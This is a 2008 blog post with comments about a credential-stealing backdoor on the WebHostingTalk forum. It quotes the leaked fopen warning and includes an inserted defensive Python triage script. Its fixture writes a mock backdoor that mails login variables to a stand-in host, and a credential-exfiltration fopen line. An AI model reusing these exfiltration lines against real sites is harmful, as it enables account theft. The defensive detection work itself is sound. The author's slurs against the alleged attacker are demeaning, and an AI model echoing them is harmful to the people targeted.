meanwhile…
Normally, when I see someone post a thread that includes multiple sentence terminators in its subject, I assume the thread starter is exaggerating the topic at hand. In this thread, however, it would appear that the poster is completely right. The only problem is, only a quarter of the forum’s user base understands why.
You see, the block of error message shows a very serious problem taking place on wht. A php script that’s masked as a .jpg file is being invisibly accessed by a php script on the server of wht, and it’s passing along three variables any time a user logs in: 1) the user’s username, 2) the user’s password, and 3) the user’s email address. After that, it isn’t completely clear what is being done with the data, but common sense tells me that the data is being sent out in an email to someone who is collecting wht accounts for some purpose.
How did it get there? Well, this is where it gets interesting. About a month ago, I was contacted by this fag who calls himself masteritx. This boring virgin who comes to the internet via a telephone line in some third world sandbox. This guy went on to tell me that he hacked wht, and to prove it he sent me an email from a webserver of wht’s, with the headers of the email clearly showing the email as being sent via a php script on a webserver of webhostingtalk. Every few weeks, he likes to contact me telling me he’s doing something new with the hack he put down on wht. What’s fucked up about it is, when he did tell inet about the vulnerabilities, he was registered, and those fucks actually banned him when they found out about the compromise. Real nice, ban the guy who offered to help you close a security hole. But, I’m not sure how masteritx went about it. He could have tried to extort them, and that could have triggered the ban, but I’m not really sure what happened. All I know is that he told me he was trying to reach wht’s admins, and a few days later he was banned. After that, he tried to tell me that he had obtained a copy of wht’s database, and that he was going to sell it to somebody.
Back to the technical specifics of the attack, the error that was posted on the thread is as follows:
Warning: fopen(http://www.webhostingtalk.com/store/images/126928744_lg.jpg?user=calamine&pass=xxxxxx&email=xxxxxx%40gmail.com): failed to open stream: HTTP request failed! HTTP/1.1 403 Forbidden in /includes/functions.php(2651) : eval()’d code(1) : eval()’d code on line 5
When the user logged in, the php script login.php calls a file under includes/functions.php, and within that file is code which uses the php fopen function to fetch http://webhostingtalk.com/store/images/126928744_lg.jpg while passing the username, password, and email address along in the URL’s query string. Note the trace in the warning: the fopen call isn’t written directly in functions.php, it sits in code that line 2651 of functions.php runs through eval() (twice nested), which is exactly where injected code would hide from a casual look at the files on disk. How did the 126928744_lg.jpg file get there? Well, my bet is that when the wiki was compromised, masteritx put a few backdoors in directories he found were chmod 777, because those are directories that the webserver would be able to write to. With those backdoors, he probably wrote a php script, disguised it as a .jpg file, and had it send him an email with the variables the user sends when they log in.
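The layout described above (a PHP backdoor dropped into a world-writable image directory, plus a line of PHP that ships login variables to it in a URL’s query string) can be checked for from the defender’s side. The following is an added example, not code from this post and not anything wht or inet ran: it builds a constructed directory tree mirroring that layout, flags image-extension files that are really PHP (or JPEGs with a PHP tag appended), lists world-writable directories under the web root, greps PHP sources for remote fetches whose query string carries credential-looking parameters, and triages a PHP warning of the shape quoted above, keeping only parameter names and dropping the values. The hostname cdn.example.invalid, the fixture contents and the sample warning line are constructed for the example.

```python
"""Triage helpers for a disguised-PHP credential backdoor (added example, constructed data)."""
import os
import re
import stat
import tempfile
from urllib.parse import parse_qs, urlsplit

# Bytes a genuine file with each image extension must start with.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
REMOTE_FETCH = re.compile(r"\b(fopen|file_get_contents|curl_init|curl_setopt)\s*\(", re.I)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
CRED_PARAM = re.compile(r"[?&](pass(word)?|pwd|user(name)?|email)\s*=", re.IGNORECASE)
PHP_WARNING = re.compile(
    r"Warning:\s+(?P<func>\w+)\((?P<url>https?://[^)\s]+)\).*?"
    r"\bin\s+(?P<file>\S+?)\((?P<line>\d+)\)(?P<rest>.*)"
)

# Constructed log line in the same shape as the warning quoted in the post; values are placeholders.
SAMPLE_WARNING = (
    "Warning: fopen(http://cdn.example.invalid/store/images/126928744_lg.jpg"
    "?user=someone&pass=REDACTED&email=someone%40example.invalid): failed to open stream: "
    "HTTP request failed! HTTP/1.1 403 Forbidden in /includes/functions.php(2651) : "
    "eval()'d code(1) : eval()'d code on line 5"
)


def classify_image_file(path):
    """Return a reason string if an image-extension file is not what it claims to be, else None."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in IMAGE_MAGIC:
        return None
    with open(path, "rb") as fh:
        data = fh.read(1 << 20)  # first MiB covers the header and any small script
    if not data.startswith(IMAGE_MAGIC[ext]):
        return "not-an-image"            # e.g. a plain PHP script renamed to .jpg
    if PHP_TAG.search(data):
        return "php-tag-inside-image"    # polyglot: valid header with PHP appended
    return None


def find_disguised_images(root):
    """Walk root and list (relative path, reason) for suspicious image files, sorted."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reason = classify_image_file(path)
            if reason:
                hits.append((os.path.relpath(path, root), reason))
    return sorted(hits)


def find_world_writable_dirs(root):
    """List directories under root that anyone (so, the web server) can write into."""
    out = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            path = os.path.join(dirpath, d)
            if os.stat(path).st_mode & stat.S_IWOTH:
                out.append(os.path.relpath(path, root))
    return sorted(out)


def find_credential_exfil(root):
    """List (relative path, line number) of PHP lines fetching a remote URL with credential params."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                for lineno, text in enumerate(fh, 1):
                    if REMOTE_FETCH.search(text) and REMOTE_URL.search(text) and CRED_PARAM.search(text):
                        hits.append((os.path.relpath(path, root), lineno))
    return sorted(hits)


def triage_php_warning(line):
    """Extract the actionable facts from a PHP warning: calling function, remote host and path,
    parameter NAMES only (values are dropped so the triage output never re-leaks a password),
    the source file and line, and how many eval() layers the call is buried under."""
    m = PHP_WARNING.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    return {
        "function": m.group("func"),
        "host": parts.hostname,
        "path": parts.path,
        "params": sorted(parse_qs(parts.query, keep_blank_values=True)),
        "file": m.group("file"),
        "line": int(m.group("line")),
        "eval_depth": m.group("rest").count("eval()"),
    }


def build_sample_tree():
    """Constructed fixture mirroring the layout described in the post; returns its root."""
    root = tempfile.mkdtemp(prefix="img-backdoor-scan-")
    img, inc = os.path.join(root, "store", "images"), os.path.join(root, "includes")
    os.makedirs(img)
    os.makedirs(inc)
    os.chmod(img, 0o777)  # the writable directory a backdoor could be dropped into
    with open(os.path.join(img, "genuine.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + b"\x00" * 64)
    with open(os.path.join(img, "126928744_lg.jpg"), "wb") as fh:  # hypothetical backdoor body
        fh.write(b"<?php mail('collector@example.invalid', 'creds', print_r($_GET, true)); ?>")
    with open(os.path.join(inc, "functions.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n$log = fopen('/var/log/app.log', 'a');\n"  # benign local fopen
                 '$leak = fopen("http://cdn.example.invalid/store/images/126928744_lg.jpg'
                 '?user=$user&pass=$pass&email=$email", "r");\n')
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    print("disguised images:", find_disguised_images(root))
    print("world-writable dirs:", find_world_writable_dirs(root))
    print("credential exfil lines:", find_credential_exfil(root))
    print("warning triage:", triage_php_warning(SAMPLE_WARNING))
```

The source grep is line-based and only catches the URL when it is spelled out in a file on disk; in the attack described above the call lived in eval()’d code, where the string can be assembled at runtime or stored outside the file tree, so the grep would miss it. That is why the warning-line triage matters: the web server logged the call as it ran, with the destination and the parameter names, regardless of how the source was hidden. The image check flags both plain scripts renamed to .jpg and JPEG polyglots with a PHP tag appended; an image whose EXIF comment happens to contain a PHP tag would also be flagged, which is an acceptable false positive for a triage pass.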
So far only one admin, Dennis, has posted. Dennis has posted to tell my friend and associate Steven that he should be posting elsewhere, and not “insulting” wht by posting information about the hack. I find inet’s disregard for user security a lot more insulting than anything Steven has posted. More information will probably come as the days go on, but the side of intelligence and security has been gaining support, with only a few idiots stepping in to defend wht’s admins.
I, too, am more than a bit worried about the exploit. The fact that nobody from inet is stepping up and acknowledging the situation is really starting to piss me off. They’re trying to feed technical bullshit to a forum full of technical guys.
Exploits happen - That shit is understandable. What I don’t get is why everyone is just brushing it off and calling it a “witch hunt”.
Comment by Hmph — Thu, Oct 23rd, 2008 @ 2:00 pm
And now that thread on WHT is closed….
Comment by J — Sun, Oct 26th, 2008 @ 1:10 pm
Even the forum staff are being left in the dark about the whole thing.
Comment by Hmph — Mon, Oct 27th, 2008 @ 6:36 pm
Well, according to info from the mods, WHT was indeed hacked. The person responsible was storing usernames, passwords, and email addresses into a database table on WHT’s servers. Scary shit indeed.
They will be requiring password changes from all users today or tomorrow.
Comment by Urg.... — Wed, Oct 29th, 2008 @ 7:51 pm
i trust wht mods with my life
Comment by Jay — Wed, Oct 29th, 2008 @ 8:39 pm
LOL @ Jay….
Just don’t be surprised when tomorrow you’re asked to change your WHT password…that’s all I’m saying.
Comment by Urg.... — Wed, Oct 29th, 2008 @ 9:08 pm
wht needs to hire a system administrator.
a real one
Comment by mikey — Thu, Oct 30th, 2008 @ 8:25 am
All they REALLY need is somebody who will admit fault when fault needs to be admitted. If Mat had simply stepped up and said, “Yeah, we were compromised. We’re looking into the cause right now. I advise you to change your passwords”, there would have been SO MUCH LESS drama and bullshit making the rounds. Instead, the members were directly lied to and were told that everything was OK.
It’s an ego thing. Mat thinks that the compromise reflects poorly on him somehow, so it is just denied, repeatedly, even with the facts staring you in the face.
Comment by Hmph — Thu, Oct 30th, 2008 @ 10:46 am